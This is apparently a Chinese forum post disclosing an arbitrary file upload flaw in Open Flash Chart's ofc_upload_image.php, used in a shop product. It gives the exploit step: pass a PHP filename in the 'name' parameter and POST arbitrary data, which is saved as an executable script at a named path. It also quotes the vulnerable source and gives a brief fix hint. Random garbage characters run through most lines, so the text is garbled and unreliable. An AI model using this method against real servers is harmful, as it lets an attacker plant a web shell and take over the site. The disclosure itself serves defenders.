POST 数据漏洞文件执行任意后缀文件保存+ _/ J' M: \7 T
漏洞文件/chart/php-ofc-library/ofc_upload_image.php5 H) R& t" _5 v" s! I3 @8 e. G
0 n4 g9 N1 q9 x- z3 o利用:5 t- a, h3 }6 \! M
/chart/php-ofc-library/ofc_upload_image.php?name=hfy.php hfy.php 文件名
% z+ ?. v" [* ~1 y# `8 `' d5 z9 G! b( f
Post任意数据
8 l, ?; s6 N% S9 }' V$ y3 w保存位置http://localhost/chart/tmp-upload-images/hfy.php$ X& d# d$ N6 p- B, U; h/ l
9 f X1 g. m0 V+ ^. ^; Y; g7 g# U& H4 a& N/ |! r& k* q6 g) w
最新版wss漏洞文件,即使是收费版本也有的,在新浪商店部署的demo~
" y5 S. W( Q% l2 P; w% \' |- X* {# k9 O; f8 v- G ~4 ^
<?php
3 r0 D$ e2 K7 \6 ^1 ]
* G* ^5 W+ j7 V% O8 g5 T//: t8 k: W9 w7 `) a1 O) X
// In Open Flash Chart -> save_image debug mode, you
6 U5 O9 j5 I% X g// will see the 'echo' text in a new window.
$ f6 }% m, f, l6 B) q; {, h//
- M* `( e9 U- D) v
6 T, j6 x' B" v2 Z0 K& T0 }/*
/ A' m6 w& k( V$ V
! B5 C; H7 w" kprint_r( $_GET );
r) A$ X. p6 V2 V1 f% b& q8 U9 Vprint_r( $_POST );
7 I F# t8 J$ L- ?' R* r( cprint_r( $_FILES );9 D! m ~8 Z; K9 g' Y& q
, |" q/ O8 t/ qprint_r( $GLOBALS );" `" ?" Z6 l& p2 U f# H
print_r( $GLOBALS["HTTP_RAW_POST_DATA"] );
' q" R3 }" a; U" {5 X* |0 u6 R: c* T2 q) W$ U3 M6 S
*/' a! ]. Y; C9 e( r
// default path for the image to be stored //
$ ~* h5 e) \! |8 V% o# e8 N/ p1 l& T$default_path = '../tmp-upload-images/';) s- I& X6 G* d
6 }' j, t$ S- y" ?if (!file_exists($default_path)) mkdir($default_path, 0777, true);+ s, v; t+ l, M
; |. n2 O6 a7 j$ `) ~1 S+ d! b// full path to the saved image including filename //
" |- Y9 G) _& g# t/ Q$destination = $default_path . basename( $_GET[ 'name' ] );
$ w6 q- H; P$ S
5 ^( S7 E# {- Z5 V' \: qecho 'Saving your image to: '. $destination;
- j% j5 ^! D, i6 h- f4 X// print_r( $_POST );
- _3 W m0 @7 B" B2 s// print_r( $_SERVER );3 k# {2 Y) z4 Y) K
// echo $HTTP_RAW_POST_DATA;
! B( Q! j; }" t5 ~' a
8 @" a5 I- a- w& l2 ^( I- j' S//
7 E- u* m+ b( n9 O V) I G* V. ?0 {// POST data is usually string data, but we are passing a RAW .png
' y; {$ D" o0 G, ~8 P( H// so PHP is a bit confused and $_POST is empty. But it has saved
, k2 i6 B' Q$ e9 ^// the raw bits into $HTTP_RAW_POST_DATA- S: B$ D' r: i; Y, K
//6 {+ }+ N3 { D0 F
) g1 O8 I2 J$ A3 U$jfh = fopen($destination, 'w') or die("can't open file");
+ w: q- B& F4 S) m: n# I; `1 F% P: Jfwrite($jfh, $HTTP_RAW_POST_DATA);
# h6 I9 Z% a: O- u8 `, t f& u/ o7 N; h1 Dfclose($jfh);
$ s7 D& Z: |6 w1 Q' a h: G* P$ t3 i, Z0 M) e
//. b, {5 i9 ?( o- ]' l8 N, T
// LOOK:5 A$ s. @# `8 j+ q
//# ~9 {( J! Z3 @! o. p
exit();
; B; u' c( E7 c( w- C; D. J( p6 B0 b//
3 D7 B) f4 } I1 q M; |$ \// PHP5:0 u9 M0 ]* n" I7 }% u5 v; k
//: Y, |9 U& S7 A
* S3 J: X9 D. C) |9 u; t3 I6 P- {6 v2 {& G# d. I1 M' u
// default path for the image to be stored //
, Q X! ~) U/ l' G9 U$default_path = 'tmp-upload-images/';! @+ `/ j5 K4 O8 E! o) i) F5 w: \; M
1 i( K+ n+ J1 O. x1 Q2 p [if (!file_exists($default_path)) mkdir($default_path, 0777, true);/ v, C2 V4 I% l& V; s+ ]6 J
7 q7 {: h6 K% [// full path to the saved image including filename //1 H8 v7 g$ P! v4 w/ n4 U" ^
$destination = $default_path . basename( $_FILES[ 'Filedata' ][ 'name' ] ); . U* I( k+ Z2 F( J2 X+ f; S' S4 {
. P$ K0 |, J9 ^, q$ L// move the image into the specified directory //
. g5 R8 S( x% `4 A6 }if (move_uploaded_file($_FILES[ 'Filedata' ][ 'tmp_name' ], $destination)) {6 {# [& a) H# q9 v* O) P* Y7 @
echo "The file " . basename( $_FILES[ 'Filedata' ][ 'name' ] ) . " has been uploaded;";2 H' }- b/ `4 o$ x2 Z+ [* U
} else {
m; s+ j/ ?* J- v; R; n echo "FILE UPLOAD FAILED";. |2 m$ s/ |1 S( [
}% y& N0 T2 v6 a1 `
+ D# G' }+ `& r1 W- p& M: n( l& q5 r* x/ T: F) }( j
?>5 {) M+ g$ J' u
( P3 K- S2 Y5 k% L' `5 ?4 i. F9 y; w; G C
* i' S1 @# {1 K$ Q0 m+ D/ u3 z
: m6 ]( y8 ~2 Y& N5 y. i4 }1 @6 w( X$ g5 G+ n S, q7 ?
7 \- M% t+ _7 a4 D: e
修复方案:
$ s, Z) g: C) }* ^8 e% m2 K. f这个漏洞文件就是个杯具,怎么破,加权限验证,后缀等验证~,自己搞 - e5 L! S. X/ S2 p" x8 d
; p7 G1 n! C5 N$ p2 m+ `* {. o5 `- t- w* W
. s/ J+ i2 w. f" v
+ I5 `# E4 t& M' k |